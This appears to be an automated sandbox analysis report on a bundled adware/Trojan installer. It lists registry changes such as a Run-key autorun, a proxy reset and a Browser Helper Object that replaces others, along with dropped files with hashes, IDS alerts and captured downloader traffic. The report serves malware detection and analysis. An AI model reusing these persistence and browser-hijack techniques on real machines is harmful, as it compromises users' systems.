"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RSD"
"Publisher" = "Beijing Rising Information Technology, Inc."
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"ravmonexe" = "gWx0Lv5HQFoFVAYjVhUWQQwq"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"URLInfoAbout" = "http://help.ikaka.com/"
[HKLM\SOFTWARE\rising\RAV]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\RAV"
"Type" = "17"
"InstallPath" = "%Program Files%\Rising\RAV"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services]
"Rising" = "Admin Test"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monShowName" = "gWx0Lv5HYFoFGTooQE0aWgxX"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B EB 5D B8 D3 40 DB 2E 70 4B 40 80 D4 A9 85 4B"
[HKLM\SOFTWARE\rising\RAV]
"(Default)" = "Rising Software Deployment System"
"Version" = "24.00.43.49"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"regtray" = "gWx0Lv5HYFoFbTsMa1I="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}]
"ProcID" = "{F2565346-E9F9-6648-3030-303030303030}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayName" = "Rising Software Deployment System"
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monServerName" = "gWx0Lv5HYEghWB8AXVVr"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}]
"ProcKey" = "RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw"
The Trojan sets the Internet Explorer security-zone option that maps UNC paths to the Local intranet zone (the default value):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the option that maps sites which bypass the proxy server to the Local intranet zone (the default value):
"ProxyBypass" = "1"
The per-user proxy is switched off:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan sets the option that maps local sites not listed in any other zone (host names without dots) to the Local intranet zone (the default value):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run at every user logon, the Trojan adds the following HKLM autorun entry, pointing at the tray component of the Rising Software Deployment System it installs (the popwndexe.exe process listed further below):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
The Trojan deletes the following value(s) in system registry. Together with "ProxyEnable" = "0" above, removing the proxy server, bypass list and auto-config URL resets Internet Explorer to a direct connection, which also takes the machine out from behind any proxy-based filtering the user had configured. The "Rising" = "Admin Test" value written under Services and deleted again looks like a write probe for administrative rights:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\System\CurrentControlSet\Services]
"Rising"
The process 9158.exe:3012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\9158web]
"VideoDevice" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 30 72 92 DD 80 34 D3 5E 1E C3 95 A9 B4 E1 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan sets the Internet Explorer security-zone option that maps UNC paths to the Local intranet zone (the default value):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the option that maps sites which bypass the proxy server to the Local intranet zone (the default value):
"ProxyBypass" = "1"
The Trojan sets the option that maps local sites not listed in any other zone (host names without dots) to the Local intranet zone (the default value):
"IntranetName" = "1"
The process popwndexe.exe:760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C4 C3 E0 07 87 56 EA 2D 7C F7 5D 82 1E CE 20"
The process xianfengupdate.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore\AllowedDomains\*]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"(Default)" = "AccountProtect Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF EE 9E 4D 17 3B 00 D8 11 50 97 5C F2 DD 87 FA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore]
"Flags" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll"
xianfengupdate.exe registers the dropped bdmanager.dll (CLSID {CDD7718A-D29A-4E86-A62D-7A44848A46C1}, whose InprocServer32 path is listed above) as a Browser Helper Object, so the DLL is loaded into every Internet Explorer process; "NoExplorer" = "1" keeps it out of Windows Explorer. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"NoExplorer" = "1"
The Trojan deletes the following registry key(s), unregistering three other Browser Helper Objects so that the entry it creates above is the only add-on left:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 C9 DF 57 1B 7B 63 FA 3B 44 DE 4B 18 5F 10 BA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| 26c9871fe8541e68df2b412884fdd3e4 | c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe |
| 4efba0b5ffd3059d1d76c70b67850138 | c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe |
| 09006a81a579d90212ccc2bb62cfecc2 | c:\Documents and Settings\All Users\Application Data\tools\bdmanager.dll |
| 231af98afa9420da45dbeff33867e39f | c:\Documents and Settings\%CurrentUserName%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll |
| 91cadaaa24017a099cce1df248e25225 | c:\Documents and Settings\%CurrentUserName%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll |
| 4f53e6f3881ff3e1ee1cc0dc0561410f | c:\Documents and Settings\%CurrentUserName%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll |
| 959ea64598b9a3e494c00e8fa793be7e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf4.tmp\System.dll |
| 012a8879efa6f8dbc3c6ba58a659fefb | c:\Program Files\tools\BaiduP2PService.exe |
| a86a90ba120c455ac0e3655f146d5a0f | c:\Program Files\tools\P2PBase.dll |
| 3b14cae0ea1d045bb5b196017913edb3 | c:\Program Files\tools\P2PStatReport.dll |
| 894ab861e608eacbac24280ab234368f | c:\Program Files\tools\P2SBase.dll |
| 83bcf3ad82ce65d2bd0fdd364fe32cb5 | c:\Program Files\tools\sr.exe |
| 3abd5c47c61a71472f00bd45991a916f | c:\Program Files\tools\tools.exe |
| 00986c841bcc897b86a2b394a1887295 | c:\Program Files\xfplay\tools.exe |
| a5e5b2726680a87868f241264e53be5a | c:\Program Files\xfplay\xianfeng.exe |
| c54a6cbbc8cd6c9309cc2b3aa4eba6d4 | c:\Program Files\xfplay\xianfengkunbang.exe |
| b2ef6010ddeca9357fae34e1fbe4ee2b | c:\Program Files\xfplay\xianfengupdate.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 1183744 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 1187840 | 20480 | 19968 | 5.41054 | 0437776d67d96306722fa79af85af88b |
| .rsrc | 1208320 | 28672 | 25600 | 4.38322 | f5640d017a00b32df01ad9febdbde008 |

The UPX0/UPX1 section names and the zero raw size of UPX0 show a UPX-packed stub whose code is unpacked into UPX0 at run time. The three sections plus headers account for under 50 KB of the 13,738,518-byte file, so almost all of it is overlay data appended after the last section, consistent with the NSIS installer classification.
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET POLICY Outdated Windows Flash Version IE
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
Traffic
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008542120341062666110713
Server: Apache
tracecode: 00008542120341062666110713
Set-Cookie: BAIDUID=32F3C5706F8B2402545910D9A50FD25A:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016772320341062666110713
Server: Apache
tracecode: 00016772320341062666110713
Set-Cookie: BAIDUID=69DAC83DF6D595A3CBDF2100CACB5A99:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /t/font_1415073294_4967172.eot? HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: at.alicdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 18124
Connection: keep-alive
Date: Fri, 07 Nov 2014 08:45:51 GMT
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=31557600
ETag: "FA439E838DACE2C479FFB8A09AA20DC4"
Last-Modified: Tue, 04 Nov 2014 03:54:54 GMT
x-oss-request-id: 545C86BFC642146A2828D1BE
Via: cache15.l2de1[0,200-0,H], cache9.l2de1[0,0], cache10.ru1[0,200-0,H], cache8.ru1[2,0]
Age: 31522441
X-Cache: HIT TCP_HIT dirn:9:460901958
X-Swift-SaveTime: Fri, 03 Apr 2015 19:31:55 GMT
X-Swift-CacheTime: 18818036
Timing-Allow-Origin: *
(binary EOT font body: iconfont Medium, Version 1.0; ttfautohint (v0.94) -l 8 -r 50 -G 200 -x 14 -w "G" -f -s) <<< skipped >>>
GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "2235a72ff18d351e39c5c63221752775:1442874344"
Last-Modified: Mon, 21 Sep 2015 22:25:43 GMT
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
(DER-encoded CRL body: issuer US / VeriSign, Inc. / VeriSign Trust Network / (c) 2006 VeriSign, Inc. - For authorized use only / VeriSign Class 3 Public Primary Certification Authority - G5; 150917000000Z .. 151231235959Z) <<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117694860581376522110713
Server: Apache
tracecode: 00117694860581376522110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA057D1ED518AD3390542:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe HTTP/1.1
Host: 203.205.148.185
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: CDN_NWS_4.2.1
Connection: keep-alive
Date: Sat, 07 Nov 2015 04:59:59 GMT
Cache-Control: max-age=600
Expires: Sat, 07 Nov 2015 05:09:59 GMT
Last-Modified: Wed, 13 May 2015 09:18:00 GMT
Content-Type: application/octet-stream
Content-Length: 1489144
X-Cache-Lookup: Hit From Disktank
MZ ... !This program cannot be run in DOS mode ... PE ... .text ... .rdata ... (PE executable body) <<< skipped >>>
GET /u.php?id=89 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.shipinbus.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 07 Nov 2015 12:58:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.28
Location: hXXp://VVV.meiheitou.com/?89-sd--ant-
GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 07 Nov 2015 05:00:29 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=-1924241393; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT
Content-type: text/html
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">
u{text-decoration:none}
body{font-family:Tahoma,Verdana,Arial,......;font-size:12px;margin:0}
.clear{clear:both;font-size:0;line-height:0;height:0}
#login{margin:0 auto;float:none;width:320px;padding:0 0 10px 50px}
.linemid{padding:10px 8px 0 30px;color:gray}
.btn_select,.btn_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px;cursor:pointer;font-weight:bold;font-size:14px}
.btn_select{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -130px}
.btn_gray{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}
#login #list_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat 0 -329px}
#list_uin li{list-style:none;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-height:20px;clear:both}
#list_uin li input{float:left;margin-bottom:5px;width:20px}
#list_uin label{margin:2px 0 0 4px;float:left;width:220px}
#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}
.x_lowLogin{padding:10px 0 0 28px;display:none}
</style><script>var g_begTime=new Date();
(function(){
	window.onerror = function(msg,url,line){
		var reportUrl = location.protoco<<< skipped >>>
GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >
<head><title>
	...............</title></head>
<body style=" margin:0px">
    <form name="form1" method="post" action="Downloaderconfig.aspx?imgtype=9158" id="form1">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZGTU5ZBXmwe1gDNP/W SPke44 A65Q==" />
</div>
<div>
	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="91FFCAD5" />
</div>
    <div>
        <object >
            <embed src="hXXp://tj.9158.com/temp/flash/1.swf" width="490px" height="180px" quality="high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" ></embed>
        </object>
    </div>
    </form>
</body>
</html>
GET /Opendownloadernewxml.aspx?softlist=&lmarkid=88 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>
<config>
	<Title>..........9158ktv</Title>
	<XieyiUrl>hXXp://tj.9158.com/temp/provision/9158ktv.htm</XieyiUrl>
	<AdvertUrl>hXXp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>
	<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>
	<ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>
	<Icon>hXXp://tj.9158.com/temp/downloaderico/main.ico</Icon>
	<IconTips>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>
	<Setuptime>20</Setuptime>
	<ToolIcon>9158........</ToolIcon>
	<Item>9158ktv</Item>
	<Mtype>19</Mtype>
	<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.html</ErrorUrl>
	<check>
		<visible>1</visible>
		<choice>1</choice>
		<checkName>........</checkName>
		<downUrl></downUrl>
	</check>
	<check>
		<visible>1</visible>
		<choice>1</choice>
		<checkName>........</checkName>
		<downUrl></downUrl>
	</check>
</config>
<<< skipped >>>
GET /temp/downloaderico/main.ico HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
